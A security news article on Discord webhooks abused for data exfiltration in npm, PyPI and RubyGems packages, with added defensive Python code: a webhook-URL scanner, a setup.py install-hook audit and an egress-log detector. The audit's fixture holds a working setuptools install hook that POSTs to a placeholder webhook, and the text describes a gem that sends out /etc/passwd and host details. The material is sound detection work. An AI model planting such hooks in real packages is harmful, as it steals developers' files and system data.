Stealth C2: Hackers Abuse Discord Webhooks for Covert Data Exfiltration in npm, PyPI, and RubyGems Supply Chain Attacks

The Socket Threat Research Team has uncovered a growing trend among malicious package developers: leveraging Discord webhooks as command-and-control (C2) endpoints to exfiltrate sensitive data from developer systems. The technique, observed in multiple ecosystems including npm, PyPI, and RubyGems, marks a shift toward low-cost, resilient, and stealthy infrastructure for malware operations.

According to the researchers, “Threat actors historically have been more likely to use their own, controlled, command and control (C2) server. However, Socket’s Threat Research team has observed attackers adopting new and creative approaches to data exfiltration.”

Discord, primarily known as a chat platform, offers webhooks—HTTPS endpoints designed for automated message posting—that attackers have repurposed as data exfiltration pipelines. Socket explains that, “Discord webhooks are HTTPS endpoints. They embed a numeric ID and secret token, and possession of the URL is enough to post payloads into a target channel.”

Since webhook URLs are write-only, defenders cannot retrieve previous messages, making forensic recovery difficult. “Webhook URLs are effectively write-only. They do not expose channel history, and defenders cannot read back prior posts just by knowing the URL.”

This “invisible” channel offers attackers a free and persistent exfiltration route, disguised as benign HTTPS traffic to discord.com.
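A static check a defender can run over an unpacked package before installing it, added here as an example and not Socket's tooling or code from any of the packages described: it finds hard-coded Discord webhook URLs, splits out the numeric ID and the secret token, and reports the token redacted, because possession of the full URL is enough to post into the channel. The regular expression, the inclusion of the legacy discordapp.com host, and the sample files are assumptions constructed for this example.

```python
import re

# A Discord webhook URL has the shape /api/webhooks/<numeric id>/<secret token>.
# discordapp.com is the legacy host that serves the same API. The pattern is an
# assumption of this example, not something taken from the page.
WEBHOOK_RE = re.compile(
    r"https?://(?:[a-z]+\.)?(discord(?:app)?\.com)/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)"
)


def redact(token):
    """Keep only the ends of the token so the scan report cannot itself be replayed."""
    return token[:4] + "..." + token[-4:] if len(token) > 8 else "***"


def find_discord_webhooks(text):
    """Return one finding per hard-coded webhook URL in `text`, with the token redacted."""
    findings = []
    for m in WEBHOOK_RE.finditer(text):
        host, webhook_id, token = m.groups()
        findings.append({
            "host": host,
            "webhook_id": webhook_id,
            "token": redact(token),
            # 1-based line number of the match, for the report
            "line": text.count("\n", 0, m.start()) + 1,
        })
    return findings


def scan_package(files):
    """`files` maps a relative path to file text, e.g. read from an unpacked tarball."""
    return {path: hits for path, src in files.items() if (hits := find_discord_webhooks(src))}


# Constructed sample package contents; these are not taken from any real package.
SAMPLE_FILES = {
    "package/index.js": (
        'const fs = require("fs");\n'
        'const HOOK = "https://discord.com/api/webhooks/123456789012345678/ConstructedTokenValue_abcdefghijklmnop";\n'
    ),
    "package/lib/legacy.js": (
        "// older code sometimes still points at the legacy host\n"
        'const url = "https://discordapp.com/api/webhooks/987654321098765432/AnotherConstructedToken_0123456789";\n'
    ),
    "package/README.md": "See https://discord.com/developers/docs for the API; no webhook URL here.\n",
}

if __name__ == "__main__":
    for path, hits in scan_package(SAMPLE_FILES).items():
        for h in hits:
            print(f"{path}:{h['line']}: {h['host']} webhook id={h['webhook_id']} token={h['token']}")
```

Run it as a pre-install gate in CI over the extracted archive; any hit on a package that has no business posting to chat channels is a reason to block the install and open an investigation. The redaction is deliberate: a finding that carries the full URL would turn the scanner's own output into a credential.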

The first example detailed by Socket involves an npm package called mysql-dumpdiscord, which exfiltrated developer configuration files — such as .env, config.json, and ayarlar.js (Turkish for settings) — to a hard-coded Discord webhook.

The malicious code reads local files and sends their contents in structured messages to Discord. “For each filename, the code resolves to an absolute path, reads the file contents, and then builds a Discord message… It POSTs that message as JSON to the Discord webhook, essentially using the Discord webhook as an exfiltration point.”

Socket described it as “a simple file exfiltration dropper, but it uses Discord instead of its own C2 server.”

Another npm module, nodejs.discord, was discovered using a similar tactic — a minimalistic wrapper that sent any string input directly to a hard-coded webhook via WebhookClient. Though not inherently malicious, Socket warns that “because the webhook URL is embedded, anything passed in can be transmitted to a third party.”

Python’s PyPI ecosystem was also found hosting Discord-based C2 malware. One example, the malinssx package, masqueraded as a test library but secretly transmitted installation telemetry to a Discord channel.

Socket explains, “This file overrides the setuptools install command to run a post-install side effect that sends a message to a Discord webhook. During pip install, RunPayload.run() JSON-encodes {‘content’: ‘Ai đó vừa cài gói maladicus qua pip!’}.”

While seemingly harmless, Socket warns that “anyone who installs the package triggers an HTTP request to a third-party Discord channel, which can be used for simple telemetry or as an exfiltration mechanism.”
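An added example, not Socket's code and not the malinssx package itself: a small AST audit of a setup.py that flags the pattern described above, a setuptools command subclass whose run() makes a network call and that is wired in through cmdclass so it executes during pip install. The two setup.py fixtures, the module and call-name watch lists, and the verdict labels are constructed assumptions of this example.

```python
import ast

# Modules that are a red flag inside a setup.py when combined with an install hook.
NETWORK_MODULES = {"urllib", "requests", "http", "socket", "httpx", "aiohttp"}
# Call names that typically perform the outbound request.
NETWORK_CALLS = {"urlopen", "post", "get", "put", "request", "create_connection", "connect"}
# setuptools commands that run during `pip install` and are commonly subclassed for side effects.
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext"}


def _base_name(expr):
    """Base class written as `install` or as `setuptools.command.install.install`."""
    if isinstance(expr, ast.Name):
        return expr.id
    if isinstance(expr, ast.Attribute):
        return expr.attr
    return None


def _call_name(call):
    if isinstance(call.func, ast.Name):
        return call.func.id
    if isinstance(call.func, ast.Attribute):
        return call.func.attr
    return None


def audit_setup_py(source):
    """Report command subclasses whose run() reaches the network and are wired via cmdclass."""
    tree = ast.parse(source)

    network_imports = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            continue
        network_imports.update(n for n in names if n.split(".")[0] in NETWORK_MODULES)

    hooks = []
    for cls in ast.walk(tree):
        if not isinstance(cls, ast.ClassDef):
            continue
        bases = {_base_name(b) for b in cls.bases} & SETUPTOOLS_COMMANDS
        if not bases:
            continue
        calls = set()
        for fn in cls.body:
            if isinstance(fn, ast.FunctionDef) and fn.name == "run":
                for node in ast.walk(fn):
                    if isinstance(node, ast.Call) and _call_name(node) in NETWORK_CALLS:
                        calls.add(_call_name(node))
        hooks.append({"class": cls.name, "command": sorted(bases)[0], "network_calls": sorted(calls)})

    # Only classes actually passed to setup(cmdclass={...}) run at install time.
    wired = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for k, v in zip(kw.value.keys, kw.value.values):
                        if isinstance(k, ast.Constant) and isinstance(v, ast.Name):
                            wired[k.value] = v.id

    suspicious = [h for h in hooks if h["network_calls"] and h["class"] in wired.values()]
    return {
        "network_imports": sorted(network_imports),
        "hooks": hooks,
        "cmdclass": wired,
        "verdict": "suspicious" if suspicious and network_imports else "clean",
    }


# Constructed fixture mirroring the pattern described in the text; placeholder webhook URL.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import json, urllib.request

WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN"

class RunPayload(install):
    def run(self):
        install.run(self)
        body = json.dumps({"content": "package installed"}).encode()
        req = urllib.request.Request(WEBHOOK, data=body, headers={"Content-Type": "application/json"})
        urllib.request.urlopen(req)

setup(name="constructed-example", version="0.0.1", cmdclass={"install": RunPayload})
'''

# Constructed benign fixture: a build hook that only writes a local file.
CLEAN_SETUP = '''
from setuptools import setup
from setuptools.command.build_py import build_py

class BuildWithVersionFile(build_py):
    def run(self):
        with open("VERSION", "w") as fh:
            fh.write("1.0.0")
        build_py.run(self)

setup(name="constructed-clean", version="1.0.0", cmdclass={"build_py": BuildWithVersionFile})
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("clean", CLEAN_SETUP)):
        print(label, audit_setup_py(src))
```

The audit never executes the setup.py, which matters because the whole point of the technique is that simply installing runs the hook. It is a heuristic: obfuscated code, dynamic imports, or hooks placed in a pyproject build backend will slip past it, so it belongs alongside a policy of installing from prebuilt wheels where possible rather than replacing one.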

The same threat actor, under the alias sdadasda232323, uploaded additional clones (malicus, maliinn) using identical Discord webhooks — all of which have since been removed from PyPI.

The RubyGems.org repository was not spared. A gem named sqlcommenter_rails contained a malicious Ruby script (exploit.rb) that harvested extensive host data — including /etc/passwd contents — and exfiltrated it to Discord.

Socket reports that the script “reads /etc/passwd, grabs DNS servers from /etc/resolv.conf, hostname, current user, current/home directories, package metadata, and calls api.ipify.org to learn the machine’s public IP.”

The collected data was then formatted into a detailed message and sent to a Discord webhook:

“It formats everything, including the full /etc/passwd contents, into a multi-line message, prints it to stdout, then POSTs the same text as JSON to the webhook using Net::HTTP over TLS.”

This gem, under the guise of a “dependency confusion test,” demonstrates how Discord’s infrastructure can support both lightweight telemetry and high-volume data exfiltration in open-source attacks.
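Because the webhook is write-only and the traffic is ordinary TLS to discord.com, the place a defender can still see it is the egress log. The following added example (not from Socket and not the gem's code) runs a detection pass over egress-proxy records: it flags any POST to a Discord webhook URL and raises the severity when the same host looked up its public IP shortly beforehand, as described for exploit.rb, or sent an unusually large request body. The log format, host names, thresholds and the list of public-IP echo services are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Webhook URL shape assumed by this example: /api/webhooks/<numeric id>/<token>.
WEBHOOK_RE = re.compile(r"https?://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/")
# Services that echo the caller's public IP; the page names api.ipify.org, the rest are assumptions.
IP_ECHO_HOSTS = {"api.ipify.org", "ifconfig.me", "icanhazip.com"}
LARGE_BODY_BYTES = 1024  # a single chat message with /etc/passwd in it is well above this

# Constructed egress-proxy log: timestamp, client host, method, URL, status, request bytes.
SAMPLE_LOG = """\
2025-10-01T10:00:01Z build-07 GET https://registry.npmjs.org/some-package 200 4212
2025-10-01T10:00:03Z build-07 GET https://api.ipify.org/ 200 14
2025-10-01T10:00:04Z build-07 POST https://discord.com/api/webhooks/123456789012345678/ConstructedToken 204 1843
2025-10-01T10:05:00Z dev-laptop-3 POST https://discord.com/api/webhooks/555555555555555555/ConstructedToken2 204 96
2025-10-01T10:06:00Z ci-runner-2 GET https://discord.com/developers/docs 200 9000
"""


def parse_line(line):
    ts, host, method, url, status, nbytes = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "host": host,
        "method": method,
        "url": url,
        "status": int(status),
        "bytes": int(nbytes),
    }


def detect_webhook_exfil(lines, window=timedelta(minutes=5)):
    """Return one alert per POST to a Discord webhook, with the reasons that apply."""
    events = [parse_line(l) for l in lines if l.strip()]
    alerts = []
    for ev in events:
        m = WEBHOOK_RE.search(ev["url"])
        if not (m and ev["method"] == "POST"):
            continue
        reasons = ["post_to_discord_webhook"]
        # Same host, earlier than this POST but inside the correlation window.
        prior = [p for p in events if p["host"] == ev["host"] and ev["ts"] - window <= p["ts"] < ev["ts"]]
        if any(urlparse(p["url"]).hostname in IP_ECHO_HOSTS for p in prior):
            reasons.append("public_ip_lookup_before_post")
        if ev["bytes"] >= LARGE_BODY_BYTES:
            reasons.append("large_request_body")
        alerts.append({
            "host": ev["host"],
            "time": ev["ts"].isoformat(),
            "webhook_id": m.group(1),
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_webhook_exfil(SAMPLE_LOG.splitlines()):
        print(f"{a['time']} {a['host']} webhook {a['webhook_id']}: {', '.join(a['reasons'])}")
```

On build and CI hosts a single webhook POST is already worth an alert, since those machines have no legitimate reason to post into chat channels; the extra reasons mainly help triage on developer workstations where Discord traffic is normal. Since the webhook cannot be read back, the proxy's captured request body (if the proxy is configured to retain it) is the only copy of what left the host, so retention of those bodies for webhook destinations is the forensic control this technique calls for.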

Socket’s Threat Research Team emphasizes that the abuse of Discord webhooks is not limited to any single language or ecosystem.
